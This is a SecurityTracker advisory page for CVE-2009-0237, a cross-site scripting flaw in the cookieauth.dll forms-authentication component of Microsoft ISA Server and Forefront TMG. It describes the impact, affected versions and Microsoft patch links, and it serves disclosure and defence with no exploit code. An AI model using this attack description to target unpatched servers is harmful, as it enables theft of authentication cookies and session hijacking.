SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Security)  >   Microsoft Internet Security and Acceleration Server Vendors:   Microsoft
Microsoft ISA Server Input Validation Flaw in 'cookieauth.dll' Permits Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1022046
SecurityTracker URL:  http://securitytracker.com/id/1022046
CVE Reference:   CVE-2009-0237   (Links to External Site)
Date:  Apr 14 2009
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): 2004 SP3, 2006 SP1; and prior service packs
Description:   A vulnerability was reported in in Microsoft ISA Server and Microsoft Forefront Threat Management Gateway. A remote user can conduct cross-site scripting attacks.

The HTML forms authentication component (cookieauth.dll) does not properly filter HTML code from user-supplied input before displaying the input. A remote user can cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Microsoft Internet Security and Acceleration Server software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Microsoft Internet Security and Acceleration Server 2000 SP2 is not affected.

The New York State Chief Information Officer / Office for Technology reported this vulnerability.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Microsoft Internet Security and Acceleration Server software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   The vendor has issued the following fixes:

Microsoft Forefront Threat Management Gateway, Medium Business Edition:

http://www.microsoft.com/downloads/details.aspx?familyid=6abf9fb4-42d0-4c67-935f-8dc67850148b

Microsoft Internet Security and Acceleration Server 2004 Standard Edition Service Pack 3:

http://www.microsoft.com/downloads/details.aspx?familyid=adf623fa-2d74-4f2a-9835-4b8debdb0e1b

Microsoft Internet Security and Acceleration Server 2004 Enterprise Edition Service Pack 3:

http://www.microsoft.com/downloads/details.aspx?familyid=d1d55ab6-3de5-4811-9693-8d43f49f5fe8

Microsoft Internet Security and Acceleration Server 2006:

http://www.microsoft.com/downloads/details.aspx?familyid=eda30bcc-0582-4f60-a4c5-ea5000b7c770

Microsoft Internet Security and Acceleration Server 2006 Supportability Update:

http://www.microsoft.com/downloads/details.aspx?familyid=eda30bcc-0582-4f60-a4c5-ea5000b7c770

Microsoft Internet Security and Acceleration Server 2006 Service Pack 1:

http://www.microsoft.com/downloads/details.aspx?familyid=eda30bcc-0582-4f60-a4c5-ea5000b7c770

A restart is required.

The Microsoft advisory is available at:

http://www.microsoft.com/technet/security/bulletin/ms09-016.mspx

Vendor URL:  www.microsoft.com/technet/security/bulletin/ms09-016.mspx (Links to External Site)
Cause:   Input validation error
Underlying OS:  Windows (2000), Windows (2003), Windows (2008)

Message History:   None.


 Source Message Contents



[Original Message Not Available for Viewing]


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC